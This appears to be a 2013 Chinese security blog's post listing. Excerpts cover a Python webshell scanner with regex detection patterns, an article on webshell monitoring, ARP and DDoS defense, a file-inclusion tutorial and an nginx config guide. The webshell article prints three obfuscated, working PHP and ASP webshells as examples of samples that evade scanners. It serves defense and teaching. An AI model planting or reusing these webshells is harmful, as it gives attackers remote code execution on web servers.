nmap的gui版本Zenmap 5.50版本下载备份

2013年10月31日 没有评论

工作中试遍了nmap5.50以上的版本,扫描中总会报C++错误结束进程,都不能用,用来用去就是nmap5.50 版本最稳定。存一份Zenmap 5.50下载备用,与诸苦逼安全君共勉。http://www.400gb.com/file/33519602

分类: 资源分享 标签: ,

RTL2832U+R820T电视棒windows下安装sdr# 以及搭建ADS-B使用VirtualRadar看飞机的教程

2013年7月20日 6 条评论

本文中提到的软件我会打包给出下载地址 http://www.400gb.com/file/75231710(包涵文中所有工具、驱动最新版及所需的.net3.5sp1环境)。这篇文章是我根据网上的教程和自己的经验修改的详细版本,为了方便入门新手。
先来说说RTL2832U+R820T在windows下安装sdr#的方法。
首先科普下sdr#。sdr#简单通俗来说就是一款可以支持RTL2832U+R820T接受调频广播的工具,可以让RTL2832U+R820T电视棒当成调频收音机来使用。类似的工具还有很多例如hdsdr等等。
1:首先插入电视棒安装驱动,注意这个驱动不是光盘里的,而是 Zadig 驱动。win7系统不要选择自动安装。要手动安装。驱动的下载地址是
http://sourceforge.net/projects/libwdi/files/zadig/ 注意XP是单独的驱动,win7下载普通版本的即可。
2:运行zading,单击 options,选择 list all devices ,在下拉列表里选择你的电视棒,绿色箭头右边默认 winusb即可 ,然后单击 instatll driver 即可。(这里要注意检查驱动是否安装成功)

zadig1zadig2
阅读全文…

python版webshell查杀

2013年7月16日 没有评论

#!/usr/bin/python
# -*- coding: utf-8 -*-
#By:Seay
#blog:www.cnseay.com

import os
import sys
import re

rulelist = [
    '(\$_(GET|POST|REQUEST)\[.{0,15}\]\(\$_(GET|POST|REQUEST)\[.{0,15}\]\))',
    '(base64_decode\([\'"][\w\+/=]{200,}[\'"]\))',
    'eval\(base64_decode\(',
    '(eval\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
    '(assert\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
    '(\$[\w_]{0,15}\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
    '(wscript\.shell)',
    '(gethostbyname\()',
    '(cmd\.exe)',
    '(shell\.application)',
    '(documents\s+and\s+settings)',
    '(system32)',
    '(serv-u)',
    '(提权)',
    '(phpspy)',
    '(后门)',
    '(webshell)',
    '(Program\s+Files)'
]

def Scan(path):
    for root,dirs,files in os.walk(path):
        for filespath in files:
            isover = False
            if '.' in filespath:
                ext = filespath[(filespath.rindex('.')+1):]
                if ext=='php':
                    file= open(os.path.join(root,filespath))
                    filestr = file.read()
                    file.close()
                    for rule in rulelist:
                        result = re.compile(rule).findall(filestr)
                        if result:
                            print '文件:'+os.path.join(root,filespath)
                            print '恶意代码:'+str(result[0])
                            print '\n\n'
                            break

if os.path.lexists(sys.argv[1]):
    print('\n\n开始扫描:'+sys.argv[1])
    print('               可疑文件                 ')
    print('########################################')
    Scan(sys.argv[1])
    print('提示:扫描完成-- O(∩_∩)O哈哈~')
else:
    print '提示:指定的扫描目录不存在---  我靠( \'o′)!!凸'

企业web安全之webshell防控浅谈

2013年7月15日 没有评论

     根据我片面的工作经验分析,目前企业遇到的入侵还是以web为入口的居多。其中webshell依然是常见的提权及渗透通道。
     下面我仅用自己的一点片面经验谈谈如何针对webshell做出安全防控工作。
     通常情况下,我们会依靠各种脚本和工具来查杀webshell,但是随着webshell的变异加密等多样化的变形方式的公布,传统的关键字对比查杀模式就出来了,大量误报以及漏报的问题。
      例如如下现在流行的几款变异小马:

exp1:

<script language=php>
$_1=chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);
@$_1(chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).
chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).
chr(97).chr(93).chr(41).chr(59));
</script>

exp2:

<%On Error Resume Next
Set f = Server.CreateObject("ADODB.Stream")
f.Type = 2
f.mode = 3
f.Charset = "gb2312"
f.open
f.WriteText "<"&Chr("37")&StrReverse(Request("cq3h63"))&Chr("37")&">"
f.SaveToFile Replace(Server.MapPath(Request("cq3h61")), ".\", "~1\")%>

exp3:

<%On Error Resume Next
{1 = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=
" & Replace(Server.MapPath(Request("p1565pe51")), ".\", "~1\")
set {a = Server.Createobject("ad"&"ox"&"."&"cata"&"log")
{a.create {1
Set { = Server.Createobject("ad"&"odb"&"."&"conne"&"ction")
{.open {1
Set {s=server.createobject("ad"&"odb.rec"&"ord"&"set")
{s.Open "create table t1(a text)", {, 1, 1
{s.Open "insert into t1(a) values ('<"&Chr("3"&"7") & 
StrReverse(Request("p1565pe53")) 
& Chr("3"&"7") & ">')", {, 1, 1%>

     这些webshell如果利用现有的脚本和工具大多会产生漏报的现象,所以个人感觉与其扫描查找webshell不如做好监控措施,把我目前所用到的一些小经验分享下。
一:文件改动对比通知。
  1:文件MD5效验。
  2:文件大小效验。
二:文件数量监控。
  1:对文件的数量进行监控,定时遍历目录对文件出现新建和删除的情况能做到及时的通知。
这些要说一下细节。监控文件个数这方面一定要做好优化工作,不然如果做了邮件通知那么监控人员一定会被轰炸死.具体的优化也很简单:对上传目录、缓存目录、删除脚本执行权限,修复掉各种解析漏洞。这样类似这些上传的目录完全可以放心的不用加入监控目录。所以安全工作就是一环扣一环。
三:定期的邮件通知。
这个不需要太多解释,你做了监控自己看不到数据是白搭。
四:代码的SVN或本地存档备份。
这个很重要,安全和监控不是程序员,不可能了解程序员的每条语句和语法。在不确定代码是否被污染的情况下,差异对比的效果就很明显了。

    这四点是我目前在工作中的心得,个人感觉随着webshell的日新月异与其努力做到查杀webshell不如做到及时监控webshell和可疑文件。

国内各互联公司安全平台及联系方式汇总

2013年6月19日 没有评论

欢迎补充排名不分先后

阅读全文…

分类: 网络安全 标签:

[安全科普]ARP攻击防范方法总结

2013年6月17日 没有评论

1:静态绑定网关MAC
2:ARP防火墙
3:VLAN和交换机端口绑定

1、静态绑定网关MAC
方法一、手工绑定:
阅读全文…

分类: 网络安全 标签:

PHP文件包含漏洞攻防实战(很科普的一篇文章)

2013年6月4日 没有评论

摘要

PHP是一种非常流行的Web开发语言,互联网上的许多Web应用都是利用PHP开发的。而在利用PHP开发的Web应用中,PHP文件包含漏洞是一种常见的漏洞。利用PHP文件包含漏洞入侵网站也是主流的一种攻击手段。本文对PHP文件包含漏洞的形成、利用技巧及防范进行了详细的分析,并通过一个真实案例演示了如何利用PHP文件包含漏洞对目标网站进行渗透测试,最终成功获取到网站的WebShell。
阅读全文…

利用XSS跨站盲打,打击三国杀钓鱼网站后台。

2013年5月27日 1 条评论

只是写写思路觉得蛮好玩的,盲打也能干点正事不是。。。

说点题外话,很奇怪盲打成功后准备修改拿到的COOKIES,好多修改COOKIES的工具和插件我机器都不成功最后用的firefox+Cookies manageer+这个插件。

受骗的小白玩家,前辈只能帮你到这里了,这样再上当你们就超神了。

今日在公司玩三国杀,突然发现我中了大奖。。。。。。

看来骗子是知道做安全的苦逼,给我提供点额外的KPI来了。。盛情难却准备盲打。

QQ0
阅读全文…

分类: 个人原创 标签: , , ,

Nginx配置文件nginx.conf中文详解

2013年5月27日 没有评论

Nginx配置参数中文说明。

#定义Nginx运行的用户和用户组
user www www;

#nginx进程数,建议设置为等于CPU总核心数。
worker_processes 8;

#全局错误日志定义类型,[ debug | info | notice | warn | error | crit ]
error_log /var/log/nginx/error.log info;
阅读全文…

分类: 杂七杂八 标签:

经典DDoS攻击类型

2013年5月22日 没有评论

经典DDoS攻击类型

DoS攻击存在很多经典的种类,从理清技术发展脉络的角度,下面简单介绍了他们的名称、原理和基本的攻击方式。

阅读全文…

分类: 网络安全 标签: